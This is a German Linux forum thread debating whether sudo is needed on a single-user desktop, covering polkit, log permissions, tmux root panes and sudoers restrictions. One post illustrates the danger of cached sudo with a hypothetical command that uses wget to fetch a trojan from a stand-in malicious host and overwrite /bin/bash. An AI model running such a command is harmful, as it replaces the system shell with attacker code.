braucht man "sudo" ?

[geier22]

Die Updates, die von MS geliefert werden, brauchen keine extra Berechtigung und werden ohne diese "Admin Fenster"
installiert. Finde ich auch richtig, da wie von mir oben schon gesagt man darüber kaum Kontrolle haben kann.
Soweit ich zurückdenken kann (weiter als XP reicht mein Gedächtnis hier nicht zurück) werden bei sonstigen Updates
immer Per Fenster die Zustimmung des Users eingeholt.
Auch bei Windows muss man für bestimmte Aktionen das Programm als Admin starten (z.B. cmd / Powershell).
Alles geht auch da nicht als user.

[geier22]

Was deine Logfiles angeht: wenn bei dir gerade nix drinsteht, was relevant sein könnte: prima. Für dich. Wie man dann darauf kommt, dass es bei jedem anderen auch so wäre, erschließt sich mir allerdings nicht.

Ich habe doch aber an den Berechtigungen nichts geändert. Alle Log- Files haben diese Berechtigung -rw-r--r--

Code: Alles auswählen

$ ls -al /var/log/auth.log 
-rw-r--r-- 1 root root 146966 Dez  2 13:17 /var/log/auth.log

Und zu den Updates:
Es ist doch überhaupt kein Problem. z.B. bei KDE das update ohne diese root Abfrage laufen zu lassen.
Der werfe den ersten Stein der jedes mal genauestens prüft, und beurteilen kann, was da upgedatet wird. Das ist z.B. ein Grund, warum ich Updates lieber auf der Konsole mache, da es - zu mindest für mich - dort übersichtlicher ist.

[Radfahrer]

Erzählt also nicht immer falsche Dinge. Wie auch bei Linux liegt es meistens am Bediener.

Klar, aber dadurch, dass jeder bei Windows als admin unterwegs war und dementsprechend Rechte hatte, ist das ganze Virus, Trojaner, Wurm und Malwareproblem doch erst so groß geworden.
Da gebe ich lieber ab und zu mal ein Passwort ein, anstatt standardmäßig alles zu erlauben, nur weil es bequemer ist. Mal ganz davon abgesehen, dass die Passwortabfrage einige vielleicht doch mal zum Nachdenken bringt, darüber, was sie gerade machen und warum dafür root-Rechte erforderlich sind.

Der werfe den ersten Stein der jedes mal genauestens prüft, und beurteilen kann, was da upgedatet wird.

Wie weiter oben schon gesagt wird, geht es doch nicht speziell um Updates. Es geht darum, dass nicht jeder Hans und Franz in Systemverzeichnissen herumwursteln darf. Wer einfach so, ohne root-Rechte ein Update installieren darf, der darf auch einen Trojaner installieren.

[Lord_Carlos]

Aber es kann doch nicht jeder Hans und Franz ins C/:Windows oder C:/Programm Files reinschreiben. Man muss es bestaetigen, aehnlich wie bei Linux eine Sudo / root pw abfrage.
Trotzdem kann man updates ohne PW starten.

Was bei Windows XP mal war ist doch nicht mehr relevant.
Oder habe ich da was falsch verstanden.

[Radfahrer]

Ich habe ja auch geschrieben, dass ich Windows seit 10 Jahren nicht mehr kenne. Wenn sie zwischenzeitlich dazugelernt haben.... umso besser. Das zeigt doch nur, dass der Linux-Weg der bessere ist. Sonst wäre Microsoft doch bei der alten "Der Nutzer darf alles"-Geschichte geblieben.

Aber es wird langsam sehr OT.
Daher noch einmal meine Meinung:
Braucht man sudo?
Auf einem Einzelplatzrechner... nein, ganz sicher nicht. Wozu?

[thoerb]

Trotzdem kann man updates ohne PW starten.

Auch bei nicht MS-Software? (Z.B. Firefox, Filezilla usw.) ...weiß ich wirklich nicht, bin nicht so der Windowsprofi.

Was bei Windows XP mal war ist doch nicht mehr relevant.
Oder habe ich da was falsch verstanden.

Nein ist nicht relevant.

[geier22]

Aber es kann doch nicht jeder Hans und Franz ins C/:Windows oder C:/Programm Files reinschreiben. Man muss es bestaetigen, aehnlich wie bei Linux eine Sudo / root pw abfrage.
Trotzdem kann man updates ohne PW starten.

Richtig.

Es ist letztendlich nur eine Frage des Designs des jeweiligen Anwendungsprogramms.
Wenn ich über PolicyKit das Update ohne PW- Abfrage erlaube, weil es eben aus meiner Sicht Sinn macht,
dann darf für den Fall des Updates in den Stammverzeichnissen geschrieben werden. Sonst nicht. Fertig

Wenn der User sich über einen USB-Stick mit der Außenwelt verbinden möchte, soll er das dürfen, und
nicht über diverse root- PW - Abfragen genervt werden.
Zumal das Ergebnis dieser blödsinnigen PW- Abfrage - Orgie dasselbe ist, als würde er sich über ein normales LAN- Kabel mit der Außenwelt verbinden. Er darf in das Internet
Wenn Sudo nicht vorhanden ist - was wir ja bei einem Desktop- System überwiegend anscheinend richtig finden,
wird es in diesem Fall sogar zu einem Sicherheitsrisiko, da das Root- PW bekannt sein müsste.
Andernfalls müsste aufwendig über Policies die Erlaubnis erteilt werden.

Edit:
Da die Anwendungsprogramme ihre eigenen Policies mitbringen, ist es also einzig und allein in der Hand das Paketbetreuers,
zu entscheiden, was das Programm darf oder eben nicht. Das war schon immer so höre ich einfach zu oft, nicht nur bei Debian.
Im Falle von ksystemlog ist es einfach eine Schlampigkeit, dass dieses Fenster immer noch kommt, und man ignorieren drücken muss, um das Programm zu starten. Oder man drückt OK dann kommt das root-PW- Abfrage-Fenster, das man wiederum ignorieren kann, oder man gibt halt das root PW ein und hat das gleiche wie vorher ?? Was soll ein neuer User
davon denken, als dass er toot irgendwann nicht mehr so erst nimmt

[DeletedUserReAsG]

Es ist doch überhaupt kein Problem. z.B. bei KDE das update ohne diese root Abfrage laufen zu lassen.

Jetzt habe ich erst erkannt, worauf du hinauswillst: du lässt es via polkit als Root laufen, was ich weiter oben schon als Möglichkeit angegeben hatte. Kann man so machen – man opfert dann halt wieder ’n Stückchen Sicherheit für ’n Stückchen mehr Bequemlichkeit. Hatte dann deine Antwort falsch verstanden, nun stellt sich mir aber die Frage: was willst du denn an den Rechten überdacht haben? Funktioniert doch, wie du möchtest?

Als Admin richtet man das System so ein, wie man’s als User haben möchte – incl. gewünschter Rechteanpassungen/-ausweitungen. Fortan kann man als User das machen, was man sich als Admin erlaubt hat, und der Admin-Account bleibt der Administration vorbehalten. Kein sudo benötigt.

Was man als Admin sich als User erlaubt, ist persönliche Ermessensfrage. Du legst eh nicht viel Wert auf Sicherheit und Stabilität, ziehst dafür Aktualität und Bequemlichkeit vor – du richtest dir dein System entsprechend ein (oder nimmst ’ne Distri, die das größtenteils für dich übernimmt) – damit ist nix verkehrt. Nur der interessierte Neuling (also etwa auch der Threadstarter) wäre besser beraten, auf etabliertere Prozeduren zu setzen. Meine Meinung.

[Lord_Carlos]

Auf einem Einzelplatzrechner... nein, ganz sicher nicht. Wozu?

Brauchen nicht. Es ist aber nett.
Ich habe eine bash histroy mit befehlen wo ich root brauche und user rechte.

Ich kann einfach abwechselt zwischen befehlen mit unterschiedlichen rechten wechseln.

$make -> libx fehlt
$sudo apt install libx
$make -> liby fehlt
$sudo apt install liby

Ohne das ich immer pw eingeben muss. Ist einfach angenehm. Geht auch wunderbar ohne.

[Animefreak79]

Wow, was hab ich hier bloß losgetreten? O_o Nur nochmal kurz:
@geier22 (wegen der Logfiles):

Code: Alles auswählen

shinji@nerv-kommandozentrale:~$ ls -l /var/log/auth.log
-rw-r----- 1 root adm 181248 Dez  2 15:17 /var/log/auth.log
shinji@nerv-kommandozentrale:~$ ls -l /var/log/messages
-rw-r----- 1 root adm 3033275 Dez  2 15:18 /var/log/messages
shinji@nerv-kommandozentrale:~$

Demzufolge:

Code: Alles auswählen

 shinji@nerv-kommandozentrale:~$ cat /var/log/auth.log
cat: /var/log/auth.log: Keine Berechtigung
shinji@nerv-kommandozentrale:~$

Und das war, nachdem ich Debian installiert hab, definitiv so voreingestellt.

[geier22]

@niemand :
Ich glaube, dass gerade ein Neuling von den vielen - aus meiner Sicht eher unnötigen - Root-PW Abfragen irritiert wird.
Nicht umsonst ist dadurch bei Ubuntu die Verwässerung von Sudo entstanden.
Ich habe seit kurzem Sudo und gksu (gksudo kdesudo) aus meinem System verbannt. Da z.B. kein einziger Editor eine eigene Policy mitbringt, ist es nur möglich über gksu (also sudo) diesen mit Rootrechten zu starten. (alternative wäre Root- Terminal mit Befehl.
Beides wäre "etabliert". Aber eben im Bezug auf die Verwendung von sudo rückwärts führend.

Die Verbannung von sudo samt Anhängen war aber nur möglich, da ich mir für diverse Programme eigene Policies angelegt habe, um z.B. einen Editor als Root aus einen Dateimanager heraus starten zu können, bzw. die Möglichkeit zu haben, einen Starter anzulegen. Wohlgemerkt : Mit PW- Abfrage
Ich halte das z.B. für sicherer als gleich den ganzen Dateimanager mit pkexec (die haben alle eine Policy) als Root zu starten. Was - soweit ich das beurteilen kann - die "etablierte Prozedur" wäre. Das über die Konsole zu machen halte ich für archaisch und nicht zeitgemäß.

Man kann aber nicht von einem Neuling verlangen, dass er dies von Anfang an beherrscht. Und stattdessen über sudo schimpfen aber keine vernünftig anzuwendenden Alternativen im System haben. Für Dolphin gibt es einen Haufen sehr praktische Erweiterungen, die alle auf sudo aufsetzen. Warum macht man sich hier keine weitergehenden Gedanken?
Das, meine ich, ist lediglich eine Frage des Designs der einzelnen Programme. Und- dass man sich Gedanken darüber macht.

[DeletedUserReAsG]

Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.

Was Lord_Carlos’ sudo-Beispiel angeht:

Code: Alles auswählen

$ make blub → libbla fehlt
$ [Strg+bm] → # aptitude install libbla
# [Strg+bm] → $ make blub

… ohne, dass ich jeweils das Passwort eingeben muss. Und ohne sudo. Aber mit tmux, und die Histories bleiben fein getrennt

[Lord_Carlos]

Was Lord_Carlos’ sudo-Beispiel angeht:

Code: Alles auswählen

$ [Strg+bm] 

Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?

Aber mit tmux, und die Histories bleiben fein getrennt

Will ich eben ja nicht.
Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.

[geier22]

Wow, was hab ich hier bloß losgetreten? O_o Nur nochmal kurz:
@geier22 (wegen der Logfiles):

Jo - das Hast du - aber anscheinend - wie ich schon sagte eben eine Frage des Designs .
Hab mal gleich recherchiert:

SparkyLinux Buster Lxqt

Code: Alles auswählen

hans@hans-pc:~$ ls -al /var/log/auth.log
-rw-r--r-- 1 root root 53127 Dez  2 15:45 /var/log/auth.log

Original Debian Stretch LXDE

Code: Alles auswählen

hans@debian:~$ ls -al /var/log/auth.log
-rw-r----- 1 root adm 2586 Dez  2 15:40 /var/log/auth.log

und Siduction KDE:
Mach ich mal komplett:40078

Da hat sich wohl was zum Sinnvollen geändert

[DeletedUserReAsG]

Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?

Es wechselt bei mir zwischen zwei Panes. Root bekommt sein Pane, wenn er das erste Mal gebraucht wird und das Pane wird geschlossen, wenn er nicht mehr gebraucht wird.

Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.

Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg. Wenn in der sudoers allerdings festgelegt ist, dass der User nur genau "apt install" ausführen darf, sieht’s wieder etwas anders aus. Dann kann ’ne böswillige Software allenfalls das System vollaufen lassen, und das bemerkt man dann hoffentlich rechtzeitig, um’s zu stoppen

[Lord_Carlos]

Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.

Aber wie ist das schlimmer als ein root panel das immer da ist?

[Radfahrer]

Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.

Genau so sehe ich das auch. Wenn alles "einfach so" geht, merkt ein Einsteiger gar nicht, was er da macht.

Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.

Und nochmal volle Zustimmung.

Wenn ich root- und Nutzerbefehle abwechselnd eingeben muss, öffne ich halt zwei Terminals.

[DeletedUserReAsG]

Aber wie ist das schlimmer als ein root panel das immer da ist?

Angenommen, du hast das Makefile nicht geprüft, sondern, weil’s aus vermeintlich sicherer Quelle stammt (die aber leider, wie’s ja ab und zu passiert, aufgemacht wurde) gleich durchlaufen lassen. Dir fehlt eine Lib → „sudo“, Userpass, installieren, alles fein. Du lässt das File nochmal durchlaufen, die Lib ist nun da, und nebenbei installiert’s dir mit etwa „sudo wget -o /bin/bash https://böslinge.inc/trojan_bash“ eine hübsche neue Shell. Dies z.B. kann bei der Variante mit dem Multiplexer nicht passieren. Abgesehen davon ist das Root-Pane nicht immer da, sondern wird wieder zugemacht, sobald der Build durch ist. Während deine 15 Minuten möglicherweise noch nicht abgelaufen sind, nachdem du fertig bist, und noch anderen Kram mit dieser Shell machst.

[Lord_Carlos]

Mhh, so oder so bin ich gefickt. Crypto Währung mining, spam versenden, Daten lesen/loeschen etc. alle ohne root.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.

Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?

Sudo im anderem Pane ist dann das beste aus beiden Welten Weil man automatisch ausgelogged wird.

[DeletedUserReAsG]

Sure, die Malware kann auch als User laufen. Aber mit UID0 lässt’s sich viel schöner verstecken und ist daher weit langlebiger. Außerdem wirkt Ransomware viel toller, wenn sie sich schon im Bootloader mit dem Hinweis meldet, das System wäre nun verschlüsselt und man solle doch dem armen Entwickler einige Kekse zukommen lassen, um das zu beheben. Und auch Keylogger und Screenshot/-recording-Programme laufen viel besser mit ausreichenden Berechtigungen. Auch nicht zu verachten sind die Ports unterhalb 1024, die sich nur mit UID0 aufmachen lassen.

# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.

[ingo2]

Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.

Das sollte man dann wenigstens gleich in der sudoers ändern:

Code: Alles auswählen

Defaults	!lecture,tty_tickets,!fqdn,targetpw,timestamp_timeout = 0

Stammt au meiner Ubuntu-Vergangenheit

[uname]

Ein falscher sudo-Befehl ist wie ein falscher root-Befehl. root ist root. Was soll das mit dem Abmelden? Was soll neben abgeforkten Prozessen noch mehr passieren? Oder werden Kindsprozesse wie screen, tmux, ... beendet? Kann das mal jemand testen?

Code: Alles auswählen

sudo whoami

Ich sehe keinen Vorteil im Ubuntu-sudo-Umfeld ... eher Nachteile.

[novalix]

@Lord_Carlos Anwendungsbeispiel ist doch ein klassisches Einsatzszenario für sudo.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.

[guennid]

Ich glaube, hier wollte auch niemand, ehmm...: keiner , die Nützlichkeit von sudo für bestimmte Zwecke und in sinnvoller Konfiguration bestreiten, aber "MAN" braucht sudo eben eher nicht.


Grüße, Günther

[TomL]

Man muss es eben nur auch richtig konfigurieren.

Vor dem Hintergrund, dass das m.M.n bei Debian gar nicht so ein großes Problem ist, wenn der unbedarfte User einfach nur den Hinweisen des Installers folgt und sich daran hält, empfinde ich das auch gar nicht so sehr als beunruhigend. Zumal diese Community ja hierzu auch eine deutliche Meinung hat. Das größere Problem sehe ich hier bei Ubuntu und Mint. Da wird definitiv kein "Newbie" oder Windows-Umsteiger sudo richtig konfigurieren, weil es in deren Community weder Hinweise dazu gibt, noch überhaupt ein Problembewusstsein besteht. Ganz im Gegenteil, da wird sogar das root-PWD als Sicherheitsrisiko hingestellt und munter der fahrlässige Missbrauch von sudo empfohlen. Natürlich juckt uns das hier nicht... aber da steckt schon Potential drin, dem Ruf von Linx allgemein zu schaden... muss nicht, aber es ist möglich... und das gefällt mir nicht.